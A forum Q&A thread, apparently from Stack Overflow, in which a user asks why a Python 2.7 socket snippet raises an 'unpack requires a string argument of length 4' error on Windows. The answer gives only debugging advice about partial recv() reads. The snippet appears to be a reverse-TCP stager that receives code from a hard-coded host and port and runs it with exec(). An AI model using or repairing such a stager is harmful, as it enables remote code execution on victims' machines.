# Python error : unpack requires a string argument of length 4

Tags: python, python-2.7

Code:

```
Host = '192.168.1.100'
Port = 1123
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
shell=struct.unpack('>I',s.recv(4))[0]
data=s.recv(shell)
while len(data)<shell:
            data+=s.recv(shell-len(data))
            exec(data,{'s':s})
```

Error :
unpack requires a string argument of length 4

Cause :

```
shell=struct.unpack('>I',s.recv(4))[0]
```

Comment: Could you please post the complete traceback of the error that you are getting ?

Comment: Note : this error only when run code on windows

Answer (score 0):

Debug this yourself, since there isn't enough information for us to do it.  Change the code to:

```
size = s.recv(4)
print(repr(size))
shell=struct.unpack('>I',size)[0]
```

`recv(n)` can return 0-n bytes.  Check the return value.  Just like your following code, loop on recv until you have 4 bytes.  It's more efficient, though, to receive a larger amount of data and buffer it, then extract the number of bytes you want.